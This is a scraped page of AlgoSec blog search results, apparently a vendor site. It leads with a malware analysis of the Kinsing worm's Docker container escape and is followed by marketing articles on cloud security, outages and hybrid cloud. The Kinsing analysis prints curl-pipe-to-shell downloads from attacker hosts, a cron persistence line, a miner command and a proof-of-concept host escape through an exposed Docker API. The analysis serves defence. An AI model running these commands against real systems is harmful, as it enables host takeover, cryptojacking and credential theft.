

Search results
621 results found with an empty search
- AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers
We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- AlgoSec | Navigating the Cybersecurity Horizon in 2024
The persistence of sophisticated ransomware In 2023, organizations faced a surge in ransomware attacks, prompting a reevaluation of... Network Segmentation Navigating the Cybersecurity Horizon in 2024 Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 12/17/23 Published The persistence of sophisticated ransomware In 2023, organizations faced a surge in ransomware attacks, prompting a reevaluation of cybersecurity readiness. The focus on high-value assets and critical infrastructure indicated an escalating threat landscape, demanding stronger preemptive measures. This trend is expected to continue in 2024 as cybercriminals exploit vulnerabilities. Beyond relying on technology alone, organizations must adopt strategies like Zero Trust and Micro-segmentation for comprehensive preparedness, fortifying data security. A resolute and practical response is crucial to safeguard critical assets in the evolving cybersecurity landscape. DevSecOps Integration DevSecOps is set to become a cornerstone in software development, integrating security practices proactively. As Infrastructure as a Service (IaaS) popularity rises, customizing security settings becomes challenging, necessitating a shift from network perimeter reliance. Anticipating an “Always-on Security” approach like Infrastructure as Code (IaC), companies can implement policy-based guardrails in the CI/CD pipeline. If risks violating the guardrails are identified, automation should halt for human review. Cloud-Native Application Protection Platforms (CNAPP): The CNAPP market has advanced from basic Cloud Security Posture Management (CSPM) to include varied vulnerability and malware scans, along with crucial behavioral analytics for cloud assets like containers. However, few vendors emphasize deep analysis of Infrastructure as a Service (IaaS) networking controls in risk and compliance reporting. A more complete CNAPP platform should also provide comprehensive analytics of cloud applications’ connectivity exposure. Application-centric approach to network security will supersede basic NSPM Prepare for the shift from NSPM to an application-centric security approach, driven by advanced technologies, to accelerate in 2024. Organizations, grappling with downsizing and staff shortages, will strategically adopt this holistic approach to improve efficiency in the security operations team. Emphasizing knowledge retention and automated change processes will become crucial to maintain security with agility. AI-based enhancements to security processes Generative AI, as heralded by Chat-GPT and its ilk, has made great strides in 2023, and has demonstrated that the technology has a lot of potential. I think that in 2024 we will see many more use cases in which this potential goes from simply being “cool” to a more mature technology that is brought to market to bring real value to owners of security processes. Any use case that involves analyzing, summarizing, or generalizing text, can potentially benefit from a generative AI assist. The trick will be to do so in ways that save human time, without introducing factual hallucinations. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- AlgoSec | Resolving human error in application outages: strategies for success
Application outages caused by human error can be a nightmare for businesses, leading to financial losses, customer dissatisfaction, and... Cyber Attacks & Incident Response Resolving human error in application outages: strategies for success Malynnda Littky-Porath 2 min read Malynnda Littky-Porath Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 3/18/24 Published Application outages caused by human error can be a nightmare for businesses, leading to financial losses, customer dissatisfaction, and reputational damage. While human error is inevitable, organizations can implement effective strategies to minimize its impact and resolve outages promptly. In this blog post, we will explore proven solutions for addressing human error in application outages, empowering businesses to enhance their operational resilience and deliver uninterrupted services to their customers. Organizations must emphasize training and education One of the most crucial steps in resolving human error in application outages is investing in comprehensive training and education for IT staff. By ensuring that employees have the necessary skills, knowledge, and understanding of the application environment, organizations can reduce the likelihood of errors occurring. Training should cover proper configuration management, system monitoring, troubleshooting techniques, and incident response protocols. Additionally, fostering a culture of continuous learning and improvement is essential. Encourage employees to stay up to date with the latest technologies, best practices, and industry trends through workshops, conferences, and online courses. Regular knowledge sharing sessions and cross-team collaborations can also help mitigate human errors by fostering a culture of accountability and knowledge transfer. It’s time to implement robust change management processes Implementing rigorous change management processes is vital for preventing human errors that lead to application outages. Establishing a standardized change management framework ensures that all modifications to the application environment go through a well-defined process, reducing the risk of inadvertent errors. The change management process should include proper documentation of proposed changes, a thorough impact analysis, and rigorous testing in non-production environments before deploying changes to the production environment. Additionally, maintaining a change log and conducting post-implementation reviews can provide valuable insights for identifying and rectifying any potential errors. Why automate and orchestrate operational tasks Human errors often occur due to repetitive, mundane tasks that are prone to oversight or mistakes. Automating and orchestrating operational tasks can significantly reduce human error in application outages. Organizations should leverage automation tools to streamline routine tasks such as provisioning, configuration management, and deployment processes. By removing the manual element, the risk of human error decreases, and the consistency and accuracy of these tasks improve. Furthermore, implementing orchestration tools allows for the coordination and synchronization of complex workflows involving multiple teams and systems. This reduces the likelihood of miscommunication and enhances collaboration, minimizing errors caused by lack of coordination. Establish effective monitoring and alerting mechanisms Proactive monitoring and timely alerts are crucial for identifying potential issues and resolving them before they escalate into outages. Implementing robust monitoring systems that capture key performance indicators, system metrics, and application logs enables IT teams to quickly identify anomalies and take corrective action. Additionally, setting up alerts and notifications for critical events ensures that the appropriate personnel are notified promptly, allowing for rapid response and resolution. Leveraging artificial intelligence and machine learning capabilities can enhance monitoring by detecting patterns and anomalies that human operators might miss. Human errors will always be a factor in application outages, but by implementing effective strategies, organizations can minimize their impact and resolve incidents promptly. Investing in comprehensive training, robust change management processes, automation and orchestration, and proactive monitoring can significantly reduce the likelihood of human error-related outages. By prioritizing these solutions and fostering a culture of continuous improvement, businesses can enhance their operational resilience, protect their reputation, and deliver uninterrupted services to their customers. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- AlgoSec | Your Complete Guide to Cloud Security Architecture
In today’s digital world, is your data 100% secure? As more people and businesses use cloud services to handle their data,... Cloud Security Your Complete Guide to Cloud Security Architecture Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 7/4/23 Published In today’s digital world, is your data 100% secure? As more people and businesses use cloud services to handle their data, vulnerabilities multiply. Around six out of ten companies have moved to the cloud, according to Statista . So keeping data safe is now a crucial concern for most large companies – in 2022, the average data leak cost companies $4.35 million . This is where cloud security architecture comes in. Done well, it protects cloud-based data from hackers, leaks, and other online threats. To give you a thorough understanding of cloud security architecture, we’ll look at; What cloud security architecture is The top risks for your cloud How to build your cloud security How to choose a CPSM (Cloud Security Posture Management) tool Let’s jump in What is cloud security architecture? Let’s start with a definition: “Cloud security architecture is the umbrella term used to describe all hardware, software and infrastructure that protects the cloud environment and its components, such as data, workloads, containers, virtual machines and APIs.” ( source ) Cloud security architecture is a framework to protect data stored or used in the cloud. It includes ways to keep data safe, such as controlling access, encrypting sensitive information, and ensuring the network is secure. The framework has to be comprehensive because the cloud can be vulnerable to different types of attacks. Three key principles behind cloud security Although cloud security sounds complex, it can be broken down into three key ideas. These are known as the ‘CIA triad’, and they are; Confidentiality Integrity Availability ‘The CIA Triad’ Image source Confidentiality Confidentiality is concerned with data protection. If only the correct people can access important information, breaches will be reduced. There are many ways to do this, like encryption, access control, and user authentication. Integrity Integrity means making sure data stays accurate throughout its lifecycle. Organizations can use checksums and digital signatures to ensure that data doesn’t get changed or deleted. These protect against data corruption and make sure that information stays reliable. Availability Availability is about ensuring data and resources are available when people need them. To do this, you need a robust infrastructure and ways to switch to backup systems when required. Availability also means designing systems that can handle ‘dos attacks’ and will interrupt service. However, these three principles are just the start of a strong cloud infrastructure. The next step is for the cloud provider and customer to understand their security responsibilities. A model developed to do this is called the ‘Shared Responsibility Model.’ Understanding the Shared Responsibility Model Big companies like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform offer public cloud services. These companies have a culture of being security-minded , but security isn’t their responsibility alone. Companies that use these services also share responsibility for handling data. The division of responsibility depends on the service model a customer chooses. This division led Amazon AWS to create a ‘shared responsibility model’ that outlines these. Image Source There are three main kinds of cloud service models and associated duties: 1. Infrastructure as a Service (IaaS), 2. Platform as a Service (PaaS) 3. Software as a Service (SaaS). Each type gives different levels of control and flexibility. 1. Infrastructure as a Service (IaaS) With IaaS, the provider gives users virtual servers, storage, and networking resources. Users control operating systems, but the provider manages the basic infrastructure. Customers must have good security measures, like access controls and data encryption. They also need to handle software updates and security patches. 2. Platform as a Service (PaaS) PaaS lets users create and run apps without worrying about having hardware on-premises. The provider handles infrastructure like servers, storage, and networking. Customers still need to control access and keep data safe. 3. Software as a Service (SaaS) SaaS lets users access apps without having to manage any software themselves. The provider handles everything, like updates, security, and basic infrastructure. Users can access the software through their browser and start using it immediately. But customers still need to manage their data and ensure secure access. Top six cybersecurity risks As more companies move their data and apps to the cloud, there are more chances for security to occur. Although cybersecurity risks change over time , some common cloud security risks are: 1. Human error 99% of all cloud security incidents from now until 2025 are expected to result from human error. Errors can be minor, like using weak passwords or accidentally sharing sensitive information. They can also be bigger, like setting up security incorrectly. To lower the risk of human error, organizations can take several actions. For example, educating employees, using automation, and having good change management procedures. 2. Denial-of-service attacks DoS attacks stop a service from working by sending too many requests. This can make essential apps, data, and resources unavailable in the cloud. DDoS attacks are more advanced than DoS attacks, and can be very destructive. To protect against these attacks, organizations should use cloud-based DDoS protection. They can also install firewalls and intrusion prevention systems to secure cloud resources. 3. Hardware strength The strength of the physical hardware used for cloud services is critical. Companies should look carefully at their cloud service providers (CSPs) hardware offering. Users can also use special devices called hardware security modules (HSMs). These are used to protect encryption codes and ensure data security. 4. Insider attacks Insider attacks could be led by current or former employees, or key service providers. These are incredibly expensive, costing companies $15.38 million on average in 2021 . To stop these attacks, organizations should have strict access control policies. These could include checking access regularly and watching for strange user behavior. They should also only give users access to what they need for their job. 5. Shadow IT Shadow IT is when people use unauthorized apps, devices, or services. Easy-to-use cloud services are an obvious cause of shadow IT. This can lead to data breaches , compliance issues, and security problems. Organizations should have clear rules about using cloud services. All policies should be run through a centralized IT control to handle this. 6. Cloud edge When we process data closer to us, rather than in a data center, we refer to the data as being in the cloud edge. The issue? The cloud edge can be attacked more easily. There are simply more places to attack, and sensitive data might be stored in less secure spots. Companies should ensure security policies cover edge devices and networks. They should encrypt all data, and use the latest application security patches. Six steps to secure your cloud Now we know the biggest security risks, we can look at how to secure our cloud architecture against them. An important aspect of cloud security practices is managing access your cloud resources. Deciding who can access and what they can do can make a crucial difference to security. Identity and Access Management (IAM) security models can help with this. Companies can do this by controlling user access based on roles and responsibilities. Security requirements of IAM include: 1. Authentication Authentication is simply checking user identity when they access your data. At a superficial level, this means asking for a username and password. More advanced methods include multi-factor authentication for apps or user segmentation. Multi-factor authentication requires users to provide two or more types of proof. 2. Authorization Authorization means allowing access to resources based on user roles and permissions. This ensures that users can only use the data and services they need for their job. Limiting access reduces the risk of unauthorized users. Role-based access control (RBAC) is one way to do this in a cloud environment. This is where users are granted access based on their job roles. 3. Auditing Auditing involves monitoring and recording user activities in a cloud environment. This helps find possible security problems and keeps an access log. Organizations can identify unusual patterns or suspicious behavior by regularly reviewing access logs. 4. Encryption at rest and in transit Data at rest is data when it’s not being used, and data in transit is data being sent between devices or users. Encryption is a way to protect data from unauthorized access. This is done by converting it into a code that can only be read by someone with the right key to unlock it. When data is stored in the cloud, it’s important to encrypt it to protect it from prying eyes. Many cloud service providers have built-in encryption features for data at rest. For data in transit, encryption methods like SSL/TLS help prevent interception. This ensures that sensitive information remains secure as it moves across networks. 5. Network security and firewalls Good network security controls are essential for keeping a cloud environment safe. One of the key network security measures is using firewalls to control traffic. Firewalls are gatekeepers, blocking certain types of connections based on rules. Intrusion detection and prevention systems (IDPS) are another important network security tool. IDPS tools watch network traffic for signs of bad activity, like hacking or malware. They then can automatically block or alert administrators about potential threats. This helps organizations respond quickly to security incidents and minimize damage. 6. Versioning and logging Versioning is tracking different versions of cloud resources, like apps and data. This allows companies to roll back to a previous version in case of a security incident or data breach. By maintaining a version history, organizations can identify and address security vulnerabilities. How a CSPM can help protect your cloud security A Cloud Security Posture Management (CSPM) tool helpful to safeguard cloud security. These security tools monitor your cloud environment to find and fix potential problems. Selecting the right one is essential for maintaining the security of your cloud. A CSPM tool like Prevasio management service can help you and your cloud environment. It can provide alerts, notifying you of any concerns with security policies. This allows you to address problems quickly and efficiently. Here are some of the features that Prevasio offers: Agentless CSPM solution Secure multi-cloud environments within 3 minutes Coverage across multi-cloud, multi-accounts, cloud-native services, and cloud applications Prioritized risk list based on CIS benchmarks Uncover hidden backdoors in container environments Identify misconfigurations and security threats Dynamic behavior analysis for container security issues Static analysis for container vulnerabilities and malware All these allow you to fix information security issues quickly to avoid data loss. Investing in a reliable CSPM tool is a wise decision for any company that relies on cloud technology. Final Words As the cloud computing security landscape evolves, so must cloud security architects. All companies need to be proactive in addressing their data vulnerabilities. Advanced security tools such as Prevasio make protecting cloud environments easier. Having firm security policies avoids unnecessary financial and reputational risk. This combination of strict rules and effective tools is the best way to stay secure. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- Global financial institution automates hybrid cloud security with AlgoSec - AlgoSec
Global financial institution automates hybrid cloud security with AlgoSec Case Study Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- AlgoSec | The great Fastly outage
Tsippi Dach, Director of Communications at AlgoSec, explores what happened during this past summer’s Fastly outage, and explores how your... Application Connectivity Management The great Fastly outage Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 9/29/21 Published Tsippi Dach, Director of Communications at AlgoSec, explores what happened during this past summer’s Fastly outage, and explores how your business can protect itself in the future. The odds are that before June 8th you probably hadn’t heard of Fastly unless you were a customer. It was only when swathes of the internet went down with the 503: Service Unavailable error message that the edge cloud provider started to make headlines . For almost an hour, sites like Amazon and eBay were inaccessible, costing millions of dollars’ worth of revenue. PayPal, which processed roughly $106 million worth of transactions per hour throughout 2020, was also impacted, and disruption at Shopify left thousands of online retail businesses unable to serve customers. While the true cost of losing a significant portion of the internet for almost one hour is yet to be tallied, we do know what caused it. What is Fastly and why did it break the internet? Fastly is a US-based content distribution network (CDN), sometimes referred to as an ‘edge cloud provider.’ CDNs relieve the load on a website’s servers and ostensibly improve performance for end-users by caching copies of web pages on a distributed network of servers that are geographically closer to them. The downside is that when a CDN goes down – due to a configuration error in Fastly’s case – it reveals just how vulnerable businesses are to forces outside of their control. Many websites, perhaps even yours, are heavily dependent on a handful of cloud-based providers. When these providers experience difficulties, the consequences for your business are amplified ten-fold. Not only do you run the risk of long-term and costly disruption, but these weak links can also provide a golden opportunity for bad actors to target your business with malicious software that can move laterally across your network and cause untold damage. How micro-segmentation can help The security and operational risks caused by these outages can be easily mitigated by implementing plans that should already be part of an organization’s cyber resilience strategy. One aspect of this is micro-segmentation , which is regarded as one of the most effective methods to limit the damage of an intrusion or attack and therefore limit large-scale downtime from configuration misfires and cyberattacks. Micro-segmentation is the act of creating secure “zones” in data centers and cloud deployments that allow your company to isolate workloads from one another. In effect, this makes your network security more compartmentalized, so that if a bad actor takes advantage of an outage in order to breach your organization’s network, or user error causes a system malfunction, you can isolate the incident and prevent lateral impact. Simplifying micro-segmentation with AlgoSec Security Management Suite The AlgoSec Security Management Suite employs the power of automation to make it easy for businesses to define and enforce their micro-segmentation strategy, ensuring that it does not block critical business services, and also meets compliance requirements. AlgoSec supports micro-segmentation by: Mapping the applications and traffic flows across your hybrid network Identifying unprotected network flows that do not cross any firewall and are not filtered for an application Automatically identifying changes that will violate the micro-segmentation strategy Ensuring easy management of network security policies across your hybrid network Automatically implementing network security policy changes Automatically validating changes Generating a custom report on compliance with the micro-segmentation policy Find out more about how micro-segmentation can help you boost your security posture, or request your personal demo . Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call
- AlgoSec AppViz Application visibility for AlgoSec Firewall Analyzer - AlgoSec
AlgoSec AppViz Application visibility for AlgoSec Firewall Analyzer Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- The power of double-layered protection across your cloud estate - AlgoSec
The power of double-layered protection across your cloud estate Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- AlgoSec | Why organizations need to embrace new thinking in how they tackle hybrid cloud security challenges
Hybrid cloud computing enables organizations to deploy sensitive workloads on-premise or in a private cloud, while hosting less... DevSecOps Why organizations need to embrace new thinking in how they tackle hybrid cloud security challenges Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/9/22 Published Hybrid cloud computing enables organizations to deploy sensitive workloads on-premise or in a private cloud, while hosting less business-critical resources on public clouds. But despite its many benefits, the hybrid environment also creates security concerns. AlgoSec’s co-founder and CTO, Prof. Avishai Wool shares his expert insights on these concerns and offers best practices to boost hybrid cloud security. Hybrid cloud computing combines on-premises infrastructure, private cloud services, and one or more public clouds. Going hybrid provides businesses with enhanced flexibility, agility, cost savings, and scalability to innovate, grow, and gain a competitive advantage. So, how can you simplify and strengthen security operations in the hybrid cloud? It all starts with visibility – you still can’t protect what you can’t see To protect their entire hybrid infrastructure, applications, workloads, and data, security teams need to know what these assets are and where they reside. They also need to see the entire hybrid estate and not just the individual elements. However, complete visibility is a serious hybrid cloud security challenge. Hybrid environments are highly complex, which can create security blind spots, which then prevent teams from identifying, evaluating, and most importantly, mitigating risk. Another hybrid cloud security concern is that you cannot implement a fragmented security approach to control the entire network. With thousands of integrated and inter-dependent resources and data flowing between them, vulnerabilities crop up, increasing the risk of cyberattacks or breaches. For complete hybrid cloud security, you need a holistic approach that can help you control the entire network. Is DevSecOps the panacea? Not quite In many organizations, DevSecOps teams manage cloud security because they have visibility into what’s happening inside the cloud. However, in the hybrid cloud, many applications have servers or clients existing outside the cloud, which DevSecOps may not have visibility into. Also, the protection of data flowing into and out of the cloud is not always under their remit. To make up for these gaps, other teams are required to manage security operations and minimize hybrid cloud risks. These additional processes and team members must be coordinated to ensure continuous security across the entire hybrid network environment. But this is easier said than done. Using IaC to balance automation with oversight is key, but here’s why you shouldn’t solely rely on it Infrastructure as code (IaC) will help you automatically deploy security controls in the hybrid cloud to prevent misconfiguration errors, non-compliance, and violations while in the production stage and pre application testing. With IaC-based security, you can define security best practices in template files, which will minimize risks and enhance your security posture. But there’s an inherent risk in putting all your eggs in the automation and IaC basket. Due to the fact that all the controls are on the operational side, it can create serious hybrid cloud security issues. And without human attention and action, vulnerabilities may remain unaddressed and open the door to cyberattacks. Since security professionals who are not on the operational side must oversee the cloud environment, it could easily open the door to miscommunication and human errors – a very costly proposition for organizations. For this very reason, you should also implement a process to regularly deploy automatic updates without requiring time-consuming approvals that slow down workflows and weaken security. Strive for 95% automated changes and only involve a person for the remaining 5% that requires human input. Hybrid cloud security best practices – start early, start strong When migrating from on-prem to the cloud, you can choose a greenfield migration or a lift-and-shift migration. Greenfield means rolling out a brand-new application. In this case, ensure that security considerations are “baked in” from the beginning and across all processes. This “shift left” approach helps build an environment that’s secure from the get-go. This ensures that all team members adhere to a unified set of security policy rules to minimize vulnerabilities and reduce security risks within the hybrid cloud environment. If you lift-and-shift on-prem applications to the cloud, note any security assumptions made when they were designed. This is important because they were not built for the cloud and may incorporate protocols that increase security risks. Next, implement appropriate measures during migration planning. For example, implement an Application Load Balancer if applications leverage plaintext protocols, and use sidecars to encrypt applications without having to modify the original codebase. You can also leverage hybrid cloud security solutions to detect and mitigate security problems in real-time. Matching your cloud security with application structure is no longer optional Before moving to a hybrid cloud, map the business logic, application structure, and application ownership into the hybrid cloud estate’s networking structure. To simplify this process, here are some tried and proven ways to consider. Break up your environment into a virtual private cloud (VPC) or virtual network. With the VPC, you can monitor connections, screen traffic, create multiple subnets, and also restrict instance access to improve security posture. Use networking constructs to segregate applications into different functional and networking areas in the cloud. This way, you can deploy network controls to segment your cloud estate and ensure that only authorized users can access sensitive data and resources. Tag all resources based on their operating system, business unit, and geographical area. Tags with descriptive metadata can help to identify resources. They also establish ownership and accountability, provide visibility into cloud consumption, and help with the deployment of security policies. Conclusion In today’s fast-paced business environment, hybrid cloud computing can benefit your organization in many ways. But to capture these 